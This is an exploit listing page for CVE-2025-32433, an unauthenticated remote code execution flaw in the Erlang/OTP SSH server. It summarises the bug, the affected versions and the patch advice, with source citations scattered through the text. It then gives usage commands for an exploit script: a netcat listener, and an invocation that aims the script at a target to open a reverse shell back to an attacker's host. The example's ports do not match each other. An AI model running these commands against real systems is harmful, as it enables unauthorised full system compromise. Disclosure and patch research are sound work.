## https://sploitus.com/exploit?id=8D8EEF4D-1DC7-5A96-8EBB-A5DBA9A02C8D
# CVE-2025-32433
CVE-2025-32433 Summary and Attack Overview
CVE-2025-32433 is a critical unauthenticated remote code execution (RCE) vulnerability in the Erlang/OTP SSH server, disclosed on April 16, 2025. Erlang/OTP SSH is a library used in various distributed and telecom applications. The flaw arises from improper handling of SSH protocol messages: the server fails to enforce the normal authentication sequence, allowing an attacker to send specially crafted SSH messages before authentication. By doing so, the attacker can inject and execute arbitrary Erlang code on the server
nvd.nist.gov
offsec.com
. In practical terms, this means an attacker with network access to a vulnerable Erlang/OTP SSH server (often running as root) can trigger a reverse shell or execute commands without any credentials, leading to full system compromise
nvd.nist.gov
offsec.com
. This vulnerability is assigned CVSS 10.0 (maximum severity)
offsec.com
.
Affected versions are all Erlang/OTP releases below OTP-27.3.3, OTP-26.2.5.11, or OTP-25.3.2.20 (the patched versions)
nvd.nist.gov
offsec.com
. Affected systems often include Linux servers or appliances running an Erlang-based SSH daemon (not to be confused with OpenSSH). Importantly, default OpenSSH servers on Linux/BSD are not vulnerable
offsec.com
. Users should assume any exposed Erlang/OTP SSH server is affected, and apply the official patches or disable the SSH service immediately.
The attack works by initiating an SSH connection and then sending a sequence of SSH messages out of order. :
usage:
sudo chmod +x exploit.py
nc -nvlp <lport>
python3 exploit.py -t <target-ip> -p 22 --lhost <attcker-ip> --lport <lisner-ip>
ex:
nc -nvlp 5555
python3 exploit.py -t 10.10.22.111 -p 22 --lhost 10.12.33.111 --lport 55555